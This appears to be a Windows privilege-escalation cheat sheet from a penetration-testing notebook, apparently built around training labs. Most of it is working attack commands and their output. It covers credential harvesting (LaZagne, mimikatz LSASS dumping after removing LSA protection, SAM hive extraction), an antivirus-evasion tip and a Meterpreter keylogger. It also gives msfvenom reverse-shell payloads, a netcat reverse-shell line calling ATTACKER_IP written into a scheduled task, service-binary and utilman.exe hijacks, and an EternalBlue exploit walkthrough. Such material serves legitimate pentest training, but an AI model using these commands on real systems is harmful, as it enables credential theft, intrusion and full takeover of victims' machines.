- 1. Automated search (Seatbelt)
- 1. Automated search (Lazagne)
- 2. Search passwords in files
- 3. Search in usual Windows files
- 4. Search in Powershell history
- 5. Search in Windows credential manager
- 6. Search for password in registry
- 7. Search for password in database
- 8. Search for password in password managers
- 9. Search in applications and third party applications
- 10. Search in IIS configuration
- 11. Extract hashes from SAM
- 12. Extract hashes from LSASS
- 13. Extract passwords from Keepass
- 14. Keylogger
- Registry - Insecure AutoRuns programs method
- Registry - Insecure startup/logon/logoff services permissions method
- Registry - AlwaysInstallElevated method
- Service exploits - Unquoted service paths method
- Service exploits - Insecure Service permissions method
- Service exploits - Insecure service executables method
- Service exploits - Weak Registry permissions method
- 1. Unpatched software
- 2. Secondary logon (MS16-032)
- 3. Eternal Blue (MS17-010)
- 4. Windows Privilege Escalation through UAC (CVE-2019-1388)
🔻Display hidden files and folders
➤ Windows 11:
- Open File Explorer from the taskbar.
- Select View > Show > Hidden items.
➤ Windows 10:
- Open File Explorer from the taskbar.
- Select View > Options > Change folder and search options.
- Select the View tab and, in Advanced settings, select Show hidden files, folders, and drives and OK.
➤ Using cmd or powershell :
dir F: /a: h / b / s
▪ /a:h: Shows the directory names and files with hidden attributes; the colon between “a” and “h” is optional;
▪ /b: Displays only the directories and files, without additional information;
▪ /s: Lists all occurrences of the specified file name in the specified directory and all subdirectories.
echo %username%
whoami /priv
whoami /groups
➤ What users are on the machine?
net users
➤ What localgroups are on the machine?
net localgroup
➤ More info about a specific user. Check if user has privileges.
net user user1
➤ Determine the users that are part of a specific localgroup
net localgroup <localgroup_name>
➤ View Domain Groups
net group /domain
➤ View Members of Domain Group
net group /domain {Group Name}
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic logicaldisk get caption
tasklist /SVC
ipconfig /all
route print
arp -A
-a displays all established connections and listening ports
-b shows the program associated with each listening port and established connection
-o reveals the process ID (PID) associated with the connection
-n uses a numerical form for addresses and port numbers
netstat -ano
netsh firewall show state
netsh firewall show config
Some driver might be vulnerable
• Detect if Windows Defender is enabled on the machine (Powershell)
get-item 'hklm:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\'
• Detect if Windows Defender is enabled on the machine (Other)
sc query windefend
• Detect third-party antivirus solutions (list the services that running on the system)
sc queryex type=service
dir /b/s proof.txt
Important note : Some exploit suggesting scripts (e.g. winPEAS) will require you to upload them to the target system and run them there. This may cause antivirus software to detect and delete them. To avoid making unnecessary noise that can attract attention, you may prefer to use WES-NG, which will run on your attacking machine. Once installed, and before using it, type the wes.py --update command to update the database. The script will refer to the database it creates to check for missing patches that can result in a vulnerability you can use to elevate your privileges on the target system. To use the script, you will need to run the systeminfo command on the target system. Do not forget to direct the output to a .txt file you will need to move to your attacking machine.
If you already have a Meterpreter shell on the target system, you can use the multi/recon/local_exploit_suggester module to list vulnerabilities that may affect the target system.
pip3 install bloodhound
bloodhound-python -d <DOMAIN> -u <USERNAME> -p <PASSWORD> -gc <COMPUTERNAME>.<DOMAIN> -c all -ns
→ EX: bloodhound-python -d example.local -u svc-admin -p s3rvice -gc laptop01.example.local -c all -ns
neo4j console start
bloodhound --no-sandbox
Drag and drop directly the zip on the bloodhound screen
# Full enumeration
C:\Tools>.\lazagne.exe all
# Arguments
positional arguments:
Choose a main command
chats Run chats module
mails Run mails module
all Run all modules
git Run git module
svn Run svn module
windows Run windows module
wifi Run wifi module
maven Run maven module
sysadmin Run sysadmin module
browsers Run browsers module
games Run games module
multimedia Run multimedia module
memory Run memory module
databases Run databases module
php Run php module
optional arguments:
-h, --help show this help message and exit
-version laZagne version
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /si password *.doc *.txt *.ini *.config
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
findstr /spin "password" *.*
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Note : Globally, replace the user by the username "C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"
Credential Manager is a Windows feature that stores logon-sensitive information for websites, applications, and networks. The credential manager can storage :
- Web credentials contain authentication details stored in Internet browsers or other applications.
- Windows credentials contain Windows authentication details, such as NTLM or Kerberos.
- Generic credentials contain basic authentication details, such as clear-text usernames and passwords.
- Certificate-based credentials: Athunticated details based on certifications.
Control Panel -> User Accounts -> Credential Manager
C:\Users\Administrator>vaultcmd /list
Currently loaded vaults:
Vault: Web Credentials
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704ACD02
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704ACD02
Vault: Windows Credentials
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B0FAB12
Location: C:\Users\Administrator\AppData\Local\Microsoft\Vault
C:\Users\Administrator>VaultCmd /listproperties:"Web Credentials"
C:\Users\Administrator>VaultCmd /listproperties:"Windows Credentials"
C:\Users\Administrator>VaultCmd /listcreds:"Web Credentials"
C:\Users\Administrator>VaultCmd /listcreds:"Windows Credentials"
C:\Users\Kiosec>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WINPRIVESC\admin
Type: Domain Password
User: WINPRIVESC\admin
Using Vaultcmd, it is not possible de show the password. However, it is possible using the following script : https://github.com/samratashok/nishang/blob/master/Gather/Get-WebCredentials.ps1
# Script :
function Get-WebCredentials
[CmdletBinding()] Param ()
$ClassHolder = [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$VaultObj = new-object Windows.Security.Credentials.PasswordVault
$VaultObj.RetrieveAll() | foreach { $_.RetrievePassword(); $_ }
# Commands :
C:\Users\Administrator>powershell -ex bypass
PS C:\Users\Administrator> Import-Module C:\Tools\Get-WebCredentials.ps1
PS C:\Users\Administrator> Get-WebCredentials
mimikatz # privilege::debug
mimikatz # sekurlsa::credman
💥 Important note : think to deactivate the lsass protection (error : ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)). The details are provided into #extract-hashes-from-LSASS part
# List the stored credentials
C:\Users\kiosec>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=admin\cyberlab
Type: Domain Password
User: admin\cyberlab
C:\Users\kiosec>runas /savecred /user:admin\cyberlab cmd.exe
C:\Users\kiosec>runas /savecred /user:admin\cyberlab C:\Path\to\my\scrip\or\reverseshell.exe
#Search "password" in istry
query HKLM /f password /t _SZ /s
query HKCU /f password /t _SZ /s
#Query this specific key to find admin AutoLogon credentials
query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
On Kali, use the winexe command to spawn a command prompt running with the admin privileges
winexe -U 'admin%password12345' // cmd.exe
Applications utilize database files to read or write settings, configurations, or credentials. Database files are usually stored locally in Windows operating systems. These files are an excellent target to check and hunt for credentials.
Examples of Password Manager applications:
- Built-in password managers (Windows)
- Third-party: KeePass, 1Password, LastPass
query "HKCU\Software\ORL\WinVNC3\Password"
query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
query "HKCU\Software\SimonTatham\PuTTY\Sessions"
query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
#Move to the McAfee folder
C:\Users\THM>cd C:\ProgramData\McAfee\Agent\DB
#Enumerate the folder
thm@THMJMP1 C:\ProgramData\McAfee\Agent\DB>dir
03/05/2022 10:03 AM 120,832 mcafee.db
#Download the DB and the attacker machine
# Ex: scp <USER>@<MACHINE_BIOS_NAME_OR_IP>:C:/ProgramData/McAfee/Agent/DB/ma.db .
scp admin1@win10:C:/ProgramData/McAfee/Agent/DB/ma.db .
#Browse the DB to find credentials
sqlitebrowser ma.db
# Decrypt Mcafee password using mcafeesitelistpwddecryption
# https://github.com/funoverip/mcafee-sitelist-pwd-decryption
# python2 mcafee_sitelist_pwd_decrypt.py <AUTH PASSWD VALUE>
python2.7 mcafee_sitelist_pwd_decrypt.py jWbTyS7BL1Hj7PkO5Di/QhhYmcGj5cOoZ2OkDTrFXsR/abAFPM9B3Q==
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
#Command: reg save HKLM\system sam
C:\Users\Administrator\Desktop> save HKLM\sam C:\users\Administrator\Desktop\sam-reg
The operation completed successfully.
#Command: reg save HKLM\system system
C:\Users\Administrator\Desktop>reg save HKLM\system C:\users\Administrator\Desktop\system-reg
The operation completed successfully.
kiosec@cyberlab:~# python3.9 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
C:\Users\Administrator>wmic shadowcopy call create Volume='C:\'
Executing (Win32_ShadowCopy)->create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
ReturnValue = 0;
ShadowID = "{D8A11619-474F-40AE-A5A0-C2FAA1D78B85}";
3. List and confirm that we have a shadow copy of the C: volume, using the vssadmin (Volume Shadow Copy Service administrative command-line tool)
C:\Users\Administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Contents of shadow copy set ID: {0c404084-8ace-4cb8-a7ed-7d7ec659bb5f}
Contained 1 shadow copies at creation time: 5/31/2022 1:45:05 PM
Shadow Copy ID: {d8a11619-474f-40ae-a5a0-c2faa1d78b85}
Original Volume: (C:)\\?\Volume{19127295-0000-0000-0000-100000000000}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: Creds-Harvesting-AD.thm.red
Service Machine: Creds-Harvesting-AD.thm.red
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\Administrator\Desktop\sam
1 file(s) copied.
C:\Users\Administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\Administrator\Desktop\system
1 file(s) copied.
meterpreter > getuid
Server username: lab\Administrator
meterpreter > hashdump
Local Security Authority Server Service (LSASS) is a Windows process that handles the operating system security policy and enforces it on a system. It verifies logged in accounts and ensures passwords, hashes, and Kerberos tickets. Windows system stores credentials in the LSASS process to enable users to access network resources, such as file shares, SharePoint sites, and other network services, without entering credentials every time a user connects.
💥 important note : In 2012, Microsoft implemented an LSA protection, to keep LSASS from being accessed to extract credentials from memory (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa = 1). Consequently, it is required to disable the LSA protection. A LSA protection deactivation using Mimikatz is presented at the end of this part.
The path of the dumped file is mentionned in a pop-up message when the dumping process is finished.
💥 important note : The dump process is writing to disk and dumping the LSASS process is detected by the antivirus and EDR. Keep in mind to add an automatic encryption method to bypass the security detection tools.
Procdump is part of Sysinternals
c:\>c:\Tools\SysinternalsSuite\procdump.exe -accepteula -ma lsass.exe c:\tmp
💥 important note : The dump process is writing to disk and dumping the LSASS process is detected by the antivirus and EDR. Keep in mind to add an automatic encryption method to bypass the security detection tools.
C:\Tools\Mimikatz> mimikatz.exe
💥 important note : the error -> ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005) means that the LSA protection is enable
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
#Install kpcli
sudo apt install -y kpcli
#Open vault and enter password
kpcli:/> open Database.kdbx
#List containers
kpcli:/> ls
kpcli:/> ls Database/*
#Move to containers
kpcli:/> cd Database/RH/
#Show specific password
kpcli:/> show -f -a Database/General/Password
#Select and display specify password
kpcli:/passcodes/Network> ls
=== Entries ===
0. Password for windows (Ticketing Server)
1. backup password (server)
kpcli:/passcodes/Network> show 0 -f
Meterpreter has a built-in keylogger which will be useful for extracting the user's keystrokes.
💥 important note : Start and run the keylogger in the SYSTEM context won't be helpfull beacause SYSTEM won't be typing any keystrokes. To capture the correct user's credentials, we will need to ensure that our shell is running in the context of that user. Fortunately, Meterpreter provides us with a 'migrate' feature to migrate to any process. An example of execution is provided here (section exploit AD user) : https://tryhackme.com/room/exploitingad
# Start the keylogger
meterpreter > keyscan_start
# Dump captured key strokes
meterpreter > keyscan_dump
# Stop the keylogger
meterpreter > keyscan_stop
Autorun is a Windows feature that is used to automatically start applications and programs during system startup.
Note: Autorun feature is disabled by default in newer versions such as Windows 10.
#Display the list of Autorun applications
C:\Users\Kiosec>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
My program REG_SZ "C:\Program Files\Autorun Program\vulnprogram.exe"
C:\Users\Kiosec>accesschk.exe /accepteula -wuv "C:\Program Files\Autorun Program\vulnprogram.exe"
Note: The applications are located into "C:\Program Files\Autorun Program\xxxx.exe
Note: Interesting group : BUILTIN\Users => all users ; "NT AUTHORITY\INTERACTIVE" => essentially all logged-on users.
mv vulnprogram.exe vuln-program_backup.exe
copy C:\Users\Kiosec\reverseshell.exe "C:\Program Files\Autorun Program\vulnprogram.exe" /Y
➤ 1. Execute Auturuns.exe (Sysinternals) and identify the programs and scripts running at the startup, logon and logoff
• In the menu click on everything (default dashboard when auturuns is executed)
• Detect the files in the following parts:
- HKCU\Software\Micrisoft\Windows\CurrentVersion\Group Policy\Scripts\Logon
- HKCU\Software\Micrisoft\Windows\CurrentVersion\Group Policy\Scripts\Logoff
- HKCU\Software\Micrisoft\Windows\CurrentVersion\Group Policy\Scripts\Startup
- ...
• If the ligne is yellow with "File not found: xxx.xxx", the file is not present in the system. In this case, the objective is to create a malicious version of the missing file (msfvenom) and upload it in the directory.
1. Verify that you can write into the folder listed in Autoruns (e.g., File not found: \\\wsus\wsusdetectpost.bat)
2. If the program is .bat, create directly a file .bat with your payload (e.g., create a new user, add the user to admin group, extract creds, etc.)
3. If the program is .exe, craft a malicous version with msfvenom
4. In both case, the malicious version should be uploaded in the folder listed in Autoruns (e.g., File not found: \\\wsus\wsusdetectpost.bat)
5. Depending the part, restart the laptop or logoff/logon in order to execute the payload
• If the ligne is red with "(Not verified)", the file is present on the system but the signature is not verify. In this case, the objective is to modify the file in order to execute our payload or simply replace the script by a new one. The steps are pretty similar than above. The most important is to verify that it is possible to write into the folder and/or modify the scripts.
➤ Alternative : detect if the user or user groups (ex: BUILTIN\Uses) can write files to the startup directory.
C:\Users\kiosec> accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
The following vbs script create a shortcut in the StartUp directory which trigger our reverse shell
AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.
C:\Users\kiosec> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\Users\kiosec> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Output: AlwaysInstallElevated REG_DWORD 0x1
msfvenom -p windows/adduser USER=lexis PASS=mypassword123! -f msi -o exploit.msi
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
msiexec /quiet /qn /i C:\Users\victim\Downloads\exploit.msi
Note :
- /quiet = Suppress any messages to the user during installation
- /qn = No GUI
- /i = Regular (vs. administrative) installation
net localgroup Administrators
Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.
List of available priviles on Windows systems : https://docs.microsoft.com/en-us/windows/win32/secauthz/privilege-constants List of expoitable privileges : https://github.com/gtworek/Priv2Admin
C:\Users\kiosec> whoami /priv
Privilege Name Description State
============================= ============================== ========
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Important note : The status Enabled is not systematically required in order to perform the attacks.
The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.
Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.
➤ backup the SAM and SYSTEM hashes
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.
➤ Copy hashes to our attacker machine
➤ Retrieve users' password hashard using impacket
kiosec@attackerlab$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
➤ Perfom PassTheHash attack using administrator's hash
user@attackerpc$ python3.9 /opt/impacket/examples/psexec.py -hashes <HASH> [email protected]
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.
➤ Taking ownership on the executable
C:\> takeown /f C:\Windows\System32\Utilman.exe
SUCCESS: The file (or folder): "C:\Windows\System32\Utilman.exe" now owned by user "VULNWINMACHINE\kiosec".
Notice that being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need.
➤ Give you full permissions
C:\> icacls C:\Windows\System32\Utilman.exe /grant kiosec:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files
➤ Replace utilman.exe with a copy of cmd.exe
C:\Windows\System32\> copy cmd.exe utilman.exe
1 file(s) copied.
➤ Lock the account session, then click on the "Ease of Access" button (on the left of the shutdown button), which runs utilman.exe with SYSTEM privileges.
These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.
Windows would try to locate and execute programs in the following order:
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe
• Using sc
sc query
sc qc <service_name>
• Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i /v "c:\" |findstr /i /v """
➤ 2. Look for Binary_path_name (Binary with space) and for each of them, check if the path is unquoted ('').
Vulnerable example: C:\Program Files\Some Folder\Service.exe
icacls "C:\Program Files\"
icacls "C:\Program Files\Some Folder\"
sc stop vulnerable_service
sc start vulnerable_service
This attack exploits a misconfigured Windows service by using the SERVICE_CHANGE_CONFIG permission, which allows a low-privilege user to modify the service’s binary path (i.e., binpath=). The attacker replaces the service's executable with a malicious one (e.g., myreverseshell.exe) and starts the service, triggering a reverse shell with SYSTEM privileges. This grants the attacker elevated access to the system.
- The attacker needs to have the permission to change the services config (SERVICE_CHANGE_CONFIG) or full access on the services (SERVICE_ALL_ACCESS)
- The service needs to runs with SYSTEM privileges (SERVICE_START_NAME)
- The attacker needs to have the capability to start or restart the service (e.g., the attacker has the permission, through a reboot, etc.)
Notes: Make sure to store the script into the same folder than accesschk. By default, the script use accesschk.exe not the x64 version.
Script : Extract_RW_Services.ps1
➤ For a specific service name
C:\tools\AccessChk> accesschk64.exe /accepteula -uwcqv <SERVICENAME>
➤ All services for a specific user
C:\tools\AccessChk> accesschk64.exe /accepteula -uwcqv <USERNAME> * /accepteula
➤ For all services
C:\tools\AccessChk> accesschk64.exe -qlc *
Other example
RW daclsvc
C:\>sc qc <SERVICE_NAME>
[SC] QueryServiceConfig SUCCESS
kiosec@seculab$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=8083 -f exe-service -o vuln-svc.exe
kiosec@seculab$ nc -lvp 8083
C:\> icacls C:\Users\unpriv\vuln-svc.exe /grant Everyone:F
Example : Modify the service config and set the BINARY_PATH_NAME (binpath) to the reverse.exe executable you created:
sc config <service_name> binpath= "\"C:\PrivEsc\vulnsvc.exe\""
Example : Change the service's associated executable and account, we can use the following command (mind the spaces after the equal signs when using sc.exe)
C:\> sc config <service_name> binPath= "C:\Users\tmp\vuln-svc.exe" obj= LocalSystem
C:\> sc stop VULNService
C:\> sc start VULNService
This attack takes advantage of a misconfigured Windows service by altering the executable it points to. Unlike the "insecure permission exploit" that changes the binary path to redirect to a different file, this attack does not modify the binary path but involves modifying or replacing the writable binary/executable file specified in the service’s configuration. When the service is started, it executes the malicious file, spawning a reverse shell with SYSTEM privileges, thereby granting the attacker elevated access to the system.
C:\Users\kiosec> sc qc vulnerable_service
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: vulnerable_service
TAG : 0
DISPLAY_NAME : System Scheduler Service
Note : PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.
Using icacls:
C:\Users\kiosec>icacls C:\PROGRAM\SYSTEM\VService.exe
C:\PROGRA~2\SYSTEM~1\VService.exe Everyone:(I)(M)
Successfully processed 1 files; Failed processing 0 files
Note : The Everyone group has modify permissions (M) on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.
Using accesschk.exe
C:\Users\kiosec>accesschk.exe /accepteula -quvw "C:\PROGRAM\SYSTEM\VService.exe"
RW Everyone
Note : The Everyone group has modify permissions (M) on the service's executable. This means we can simply overwrite it with any payload of our preference, and the service will execute it with the privileges of the configured user account.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=443 -f exe-service -o reverse-shell.exe
Note : Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group.
C:\Users\kiosec> cd C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1> move VService.exe VService.exe.bkp
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> move C:\Users\thm-unpriv\reverse-shell.exe VService.exe
1 file(s) moved.
C:\PROGRA~2\SYSTEM~1> icacls VService.exe /grant Everyone:F
Successfully processed 1 files.
Note : in a normal scenario, you would likely have to wait for a service restart
C:\Users\kiosec> sc stop windowsscheduler
C:\Users\kiosec> sc start windowsscheduler
In progress
C:\Users\kiosec>sc qc vulnerableservicename
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: vulnerableservicename
C:\User\Kiosec>accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\vulnerableservicename
Medium mandatory level (Default} [No-Write-Up]
Note: The paths to the services are HKLM\System\CurrentControlSet\Services<SERVICENAME>
Note: "NT AUTHORITY\INTERACTIVE" group is essentially all logged-on users.
reg add HKLM\SYSTEM\CurrentControlSet\services\vulneerableservicename /v ImagePath /t REG_EXPAND_SZ /d C:\THE\PATH\TO\MY\reversshell.exe /f
net start vulnerableservicename
➤ Step 01 : Scheduled tasks can be listed from the command line using the schtasks command without any options.
C:\Users\kiosec> schtasks
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
vulnerable_scheduled_task N/A Ready
Folder: \Microsoft
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows
TaskName Next Run Time Status
======================================== ====================== ===============
Server Initial Configuration Task N/A Disabled
Folder: \Microsoft\Windows\.NET Framework
TaskName Next Run Time Status
======================================== ====================== ===============
.NET Framework NGEN v4.0.30319 N/A Ready
.NET Framework NGEN v4.0.30319 64 N/A Ready
.NET Framework NGEN v4.0.30319 64 Critic N/A Disabled
.NET Framework NGEN v4.0.30319 Critical N/A Disabled
➤ Step 02 : To retrieve detailed information about any of the services, you can use a command like the following one:
C:\Users\kiosec> schtasks /query /tn vulnerable_scheduled_task /fo list /v
Folder: \
TaskName: \vulnerable_scheduled_task
Task To Run: C:\tasks\schtask.bat
Run As User: admin
Note : "Task to Run" parameter which indicates what gets executed by the scheduled task, and the "Run As User" parameter, which shows the user that will be used to execute the task. If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the admin user, resulting in a simple privilege escalation.
C:\Users\kiosec> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
Note : As can be seen in the result, the BUILTIN\Users group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like.
C:\Users\kiosec>accesschk.exe /accepteula -quvw kiosec c:\tasks\schtask.bat
C:\Users\kiosec> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 443 > C:\tasks\schtask.bat
C:\Users\kiosec> echo C:\tools\myreverseshell.exe >> C:\tasks\schtask.bat
➤ Step 05 BIS : Manually run the task (Probably wouldn't be able to start the task in a real scenario)
C:\Users\kiosec> schtasks /run /tn vulnerable_scheduled_task
Windows DLLs are libraries that are used or claled whn applications or service are started. if the applications or service cannot locate the required DLLs, we can force the application or service to load our own DLL that will run arbitrary commands. in order to do this, we first locate an application that runs wirh SYSTEM privileges and have the appropriate PATH permissions that can allow us to upload our custom DLL.
The typically pathis are :
- Application path or directory
- C:\Windows\System32
- C:\Windows\System
- C:\Windows
- C:\Program Files
- The PATH environment variable
In the case of no absolute PATH has been defined. Example of absolute PATH : PATH = C:\Windows\System32\abc.dll (The application or service knows exactly where to locate it) Example of undefined service DLL : PATH = abc.dll (The application or service doesn't know exactly where to locate it)
Use the WinPEAS tools (ex: .\winPEASx64.exe servicesinfo)
Use the Sysinternals Procmon tool (ex: filter on value "NAME NOT FOUND" and display ".dll")
Use the Autoruns tool (sysinternals)
sc stop <SERVICE>
sc start >SERVICE>
Note : in a normal scenario, you would likely have to wait for a service restart (or restart the laptop for a service execution at the start up)
C:\Users\kiosec> wmic product get name,version,vendor
Important note : The command wmic product may not return all installed programs. Depending on how some of the programs were installed, they might not get listed. It is always required to double check with the 'add delete native windows services' as well as the desktop shortcuts and available services.
https://www.exploit-db.com/ https://packetstormsecurity.com/ https://fr.0day.today/ https://cxsecurity.com/exploit/ https://www.rapid7.com/db/ Google search
The following versions of Windows are affected :
- Windows 7
- Windows Server 2008
- Windows 8.1
- Windows Server 2012
- Windows 10
Important note : The exploit requires certain dependencies to work : the target system should have two or more CPU cores and the should be running Powershell V2.0 or later.
nmap -sC -sV --script vuln <ip>
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
nmap --script smb-vuln* <target-ip>
nmap --script=smb-vuln-ms17–010.nse <target-ip>
use auxiliary/scanner/smb/smb_ms17_010
💥 important note : Executed in root shell
The autoblue exploit has been developed by 3ndG4me and can be found here : https://github.com/3ndG4me/AutoBlue-MS17-010
An step by step demonstration created by HackerSploit can be found here : https://www.youtube.com/watch?v=_uLJB_Ys120
➤ 1. Clone the github
kiosec@lab:~$ git clone https://github.com/3ndG4me/AutoBlue-MS17-010
➤ 2. Install the requirements
kiosec@lab:~$ cd AutoBlue-MS17-010/
kiosec@lab:~$ pip3 install -r requirements.txt
➤ 3. Execute shell_prep.sh and complete the parameters (Creation of the payload)
kiosec@lab:~$ cd shellcode
kiosec@lab:~$ chmod +x shell_prep.sh
kiosec@lab:~$ ./shell_prep.sh
'-..-'| || |
'-..-'| || |
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
LHOST for reverse connection:
LPORT you want x64 to listen on:
LPORT you want x86 to listen on:
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
Type 0 to generate a staged payload or 1 to generate a stageless payload
Generating x64 cmd shell (stageless)...
Important note : Automatically create multiple x64 and x86 shellcodes. Using netcat and not meterpreter, it's vital to use the 'sc_x86.bin' generated payload.
➤ 4. Execute your listener (netcat)
nc -nvlp <PORT>
➤ 6. Execute the exploit
# python eternalblue_exploit7.py <target_ip> <generated_revershell>
python eternalblue_exploit7.py ./shellcode/sc_x86.bin
💥 important note : Executed in root shell
The autoblue exploit has been developed by helviojunior and can be found here : https://github.com/helviojunior/MS17-010
➤ 1. Install the prerequisites (Python2, pip for python2 and impacket)
wget https://bootstrap.pypa.io/pip/2.7/get-pip.py
python2 get-pip.py
pip install impacket
# or in case of error
pip install impacket==0.9.22
➤ 2. Download the exploit
git clone https://github.com/helviojunior/MS17-010
➤ 3. Modify the exploit script (send_and_execute.py)
EDIT the 'send_and_execute.py' exploit script and set the username : Guest
➤ 4. Create the listener
msfvenom -p windows/shell_reverse_tcp LHOST=<LOCAL-IP> LPORT=<LOCAL-PORT> EXITFUNC=thread -f exe -a x86 — platform windows -o ms17–010.exe
➤ 5. Execute the exploit
